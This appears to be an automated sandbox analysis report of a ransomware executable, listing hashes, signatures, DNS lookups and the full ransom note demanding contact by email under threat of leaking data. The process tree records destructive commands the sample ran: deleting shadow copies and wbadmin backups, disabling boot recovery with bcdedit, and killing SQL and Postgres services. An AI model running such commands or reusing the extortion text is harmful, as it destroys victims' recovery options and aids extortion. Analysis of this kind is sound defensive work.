Analysis

  • max time kernel
    162s
  • max time network
    176s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20231215-en locale:en-us os:windows10-2004-x64 system
  • submitted
    01-01-2024 15:12

General

  • Target

    3538750cfe06d8fe364bc4f396229bfd08c9856f17477b0f8444d35a7f89775f.exe

  • Size

    332KB

  • MD5

    7286267a7eeaf2c3122635c5edb71e84

  • SHA1

    d342d986442a20453d3c9a438766758301d88d4e

  • SHA256

    3538750cfe06d8fe364bc4f396229bfd08c9856f17477b0f8444d35a7f89775f

  • SHA512

    8567661bc656edbacd0ca59f1d1b38cad7c3101d8d06772ae1eba9828792327cbc6b4254e5e61d2b190f4f4350c6288ac2e5c811f7a4ed0c38bc4be8ccf636f0

  • SSDEEP

    6144:0LI9sGqBET+/evZ9zgDU/JSrJyhSdDXR0sVWorEriYtkD:d9JL+/eh90DU/JYUh01YtkD

Score
10/10

Malware Config

Extracted

Path

C:\odt\How_to_back_files.html

Ransom Note
<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;"></span> <br> <!-- !!! dont changing this !!! --> </div> </div> <!-- --> <div class="tabs"> <!--tab--> <div class="tab"> <div id="tab-content1" class="content"> <div class="text"> <!--text data --> <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. 
This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>Contact us for price and get decryption software.</b><br><br> <hr> <b>email:</b><br> <a href="ithelp011@decorous.cyou ">ithelp011@decorous.cyou </a> <br> <a href="ithelp011@decorous.cyou ">ithelp011@decorous.cyou </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> </div> </div> </div> <!--tab--> <!--text data --> </div> </div> <!--tab--> </div> </div> </body> </html>
Emails

ithelp011@decorous.cyou

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (446) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes system backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 14 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\3538750cfe06d8fe364bc4f396229bfd08c9856f17477b0f8444d35a7f89775f.exe
    "C:\Users\Admin\AppData\Local\Temp\3538750cfe06d8fe364bc4f396229bfd08c9856f17477b0f8444d35a7f89775f.exe"
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:4088
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4888
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
        3⤵
        PID:2268
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1436
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2564
        • C:\Windows\system32\taskkill.exe
          taskkill -f -im sqlbrowser.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4896
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3636
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:556
        • C:\Windows\system32\taskkill.exe
          taskkill -f -im sql writer.exe
          4⤵
          • Kills process with taskkill
          PID:1860
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1648
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3336
        • C:\Windows\system32\taskkill.exe
          taskkill -f -im sqlserv.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1992
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:932
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3876
        • C:\Windows\system32\taskkill.exe
          taskkill -f -im msmdsrv.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1636
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5040
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4804
        • C:\Windows\system32\taskkill.exe
          taskkill -f -im MsDtsSrvr.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1724
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1972
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\system32\taskkill.exe
          taskkill -f -im sqlceip.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1580
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4724
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4456
        • C:\Windows\system32\taskkill.exe
          taskkill -f -im fdlauncher.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3076
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1976
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1200
        • C:\Windows\system32\taskkill.exe
          taskkill -f -im Ssms.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4352
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      2⤵
      PID:2996
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
        3⤵
        PID:2776
        • C:\Windows\system32\taskkill.exe
          taskkill -f -im SQLAGENT.EXE
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4728
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      2⤵
      PID:3352
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
        3⤵
        PID:4332
        • C:\Windows\system32\taskkill.exe
          taskkill -f -im fdhost.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5100
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      2⤵
      PID:5104
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
        3⤵
        PID:2992
        • C:\Windows\system32\taskkill.exe
          taskkill -f -im ReportingServicesService.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4512
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      2⤵
      PID:3696
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
        3⤵
        PID:3756
        • C:\Windows\system32\taskkill.exe
          taskkill -f -im msftesql.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5020
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      2⤵
      PID:4364
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
        3⤵
        PID:4244
        • C:\Windows\system32\taskkill.exe
          taskkill -f -im pg_ctl.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1160
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
      2⤵
      PID:4896
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
        3⤵
        PID:3640
        • C:\Windows\system32\taskkill.exe
          taskkill -f -impostgres.exe
          4⤵
          • Kills process with taskkill
          PID:1556
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      2⤵
      PID:4672
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
        3⤵
        PID:3468
        • C:\Windows\system32\net.exe
          net stop MSSQLServerADHelper100
          4⤵
          PID:1936
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop MSSQLServerADHelper100
            5⤵
            PID:1276
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
      2⤵
      PID:2480
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
        3⤵
        PID:3868
        • C:\Windows\system32\net.exe
          net stop MSSQL$ISARS
          4⤵
          PID:1636
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop MSSQL$ISARS
            5⤵
            PID:3708
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
      2⤵
      PID:3192
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
        3⤵
        PID:2728
        • C:\Windows\system32\net.exe
          net stop MSSQL$MSFW
          4⤵
          PID:5040
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop MSSQL$MSFW
            5⤵
            PID:2536
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      2⤵
      PID:2720
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
        3⤵
        PID:1824
        • C:\Windows\system32\net.exe
          net stop SQLAgent$ISARS
          4⤵
          PID:1972
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop SQLAgent$ISARS
            5⤵
            PID:3916
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      2⤵
      PID:3804
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
        3⤵
        PID:4724
        • C:\Windows\system32\net.exe
          net stop SQLAgent$MSFW
          4⤵
          PID:728
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
      2⤵
      PID:4168
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
        3⤵
        PID:1960
        • C:\Windows\system32\net.exe
          net stop SQLBrowser
          4⤵
          PID:1704
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop SQLBrowser
            5⤵
            PID:4608
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
      2⤵
      PID:3940
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
        3⤵
        PID:528
        • C:\Windows\system32\net.exe
          net stop REportServer$ISARS
          4⤵
          PID:3104
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop REportServer$ISARS
            5⤵
            PID:4316
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
      2⤵
      PID:2964
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
        3⤵
        PID:1148
        • C:\Windows\system32\net.exe
          net stop SQLWriter
          4⤵
          PID:3080
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop SQLWriter
            5⤵
            PID:4084
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      2⤵
      PID:5104
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        PID:2268
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe Delete Shadows /All /Quiet
          4⤵
          • Interacts with shadow copies
          PID:4204
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      PID:4288
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        PID:4284
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:3924
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
      2⤵
      PID:3116
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
        3⤵
        PID:4668
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {default} recoverynabled No
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:5044
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      2⤵
      PID:2168
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
        3⤵
        PID:1436
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic.exe SHADOWCOPY /nointeractive
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4028
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
      2⤵
      PID:3060
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
        3⤵
        PID:3640
                                                                                                                    • C:\Windows\system32\wbadmin.exe
                                                                                                                      wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                      4⤵
                                                                                                                        PID:5040
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                    2⤵
                                                                                                                      PID:888
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                        3⤵
                                                                                                                          PID:2236
                                                                                                                          • C:\Windows\system32\wbadmin.exe
                                                                                                                            wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                            4⤵
                                                                                                                            • Deletes System State backups
                                                                                                                            • Drops file in Windows directory
                                                                                                                            PID:2728
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                        2⤵
                                                                                                                          PID:496
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                            3⤵
                                                                                                                              PID:4912
                                                                                                                              • C:\Windows\system32\wbadmin.exe
                                                                                                                                wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                                4⤵
                                                                                                                                • Deletes system backups
                                                                                                                                PID:4704
                                                                                                                        • C:\Windows\Explorer.EXE
                                                                                                                          C:\Windows\Explorer.EXE
                                                                                                                          1⤵
                                                                                                                            PID:3372
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3538750cfe06d8fe364bc4f396229bfd08c9856f17477b0f8444d35a7f89775f.exe
                                                                                                                              \\?\C:\Users\Admin\AppData\Local\Temp\3538750cfe06d8fe364bc4f396229bfd08c9856f17477b0f8444d35a7f89775f.exe -network
                                                                                                                              2⤵
                                                                                                                              • System policy modification
                                                                                                                              PID:1936
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c pause
                                                                                                                                3⤵
                                                                                                                                  PID:2032
                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                              C:\Windows\system32\net1 stop SQLAgent$MSFW
                                                                                                                              1⤵
                                                                                                                                PID:4400
                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:3176

                                                                                                                              Network

                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                55.36.223.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                55.36.223.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                5.181.190.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                5.181.190.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                2.136.104.51.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                2.136.104.51.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                18.173.189.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                18.173.189.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                158.240.127.40.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                158.240.127.40.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                208.194.73.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                208.194.73.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                208.194.73.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                208.194.73.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                                2
                                                                                                                                2

                                                                                                                                DNS Request

                                                                                                                                208.194.73.20.in-addr.arpa

                                                                                                                                DNS Request

                                                                                                                                208.194.73.20.in-addr.arpa

                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                              Downloads

                                                                                                                              • C:\odt\How_to_back_files.html

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                                MD5

                                                                                                                                24a9adc4a8f7dc610cf2a997c9b02eb2

                                                                                                                                SHA1

                                                                                                                                a1ab40cebbbf8cef8f6274bda5a2b382fb585204

                                                                                                                                SHA256

                                                                                                                                3e3829b08948b257f42a75bd6b3c86dcbc1ad41ed36a8520caf60b99bc03531d

                                                                                                                                SHA512

                                                                                                                                002db1b95eab0c79f75bc480945deb573174076af73d9412b57f2a3eeade1e4c3cdc159e5fd4abc66fad39242d364bde975e73d883d6aaa02f0ddf9037879079
